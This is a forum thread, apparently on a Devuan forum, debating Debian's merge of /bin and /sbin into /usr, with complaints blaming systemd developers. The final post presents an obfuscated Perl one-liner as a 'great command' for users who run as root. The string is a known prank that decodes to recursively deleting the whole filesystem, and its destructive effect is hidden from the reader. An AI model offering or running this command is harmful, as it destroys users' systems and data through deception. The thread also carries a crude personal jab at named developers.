UsrMerge on Devuan?

Hi!

I installed Debian recently and that /bin and /sbin pointing to /usr/bin and /usr/sbin is freaking my OCD out! I can't use it like that.  LOL

How this freaking crazy move will affect Devuan?

Another question... Will "/usr" be the new "/" ?  :-D

Cheers!
Thiago

Re: UsrMerge on Devuan?

IIRC the default in Devuan Beowulf will be to NOT merge /usr.

I'm curious, why don't you like it?

I really appreciate the simplification, I just wish Debian would merge */sbin with */bin like Arch do.

Re: UsrMerge on Devuan?

So far from that link i posted i get the impression debian want more compatibility with other unixes/linuxes in behavior, so far only one is listed, solaris. I suppose this purely from a dev point of view in regards to unix to unix compatibility?

Why would debian need to be compatible with other unix and linux? It is a universal operation system but it is its own operating system that operates independently from others. Unless we are headed for something like microsoft windows for linux, i dont see the point in this.

Re: UsrMerge on Devuan?

The merge have perfect meaning in 2019, IMHO. Please remember why some split was needed in the first place and think about it with the hardware resources we have nowadays:

C'mon!
Let's hide the whole system in /.../*!
That's what the enduser really wants!
I do know that!
Trust me...

Kay Sievers (a boyfriend of Lennart Poettering) demanded that because systemd didn't work well with correct filesystem standard. It was something like "Your standards doesn't work with our DIY piece of code therefore your standards sucks". Now so called "freedesktop.org" (in fact they are pro-corporate anti-community group) trying to put that insanity into every distro. The /usr filesystem was created for a reason.

I know great command for such endusers. Usually they want to work with computer as root because its "simple" and "easy".

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'
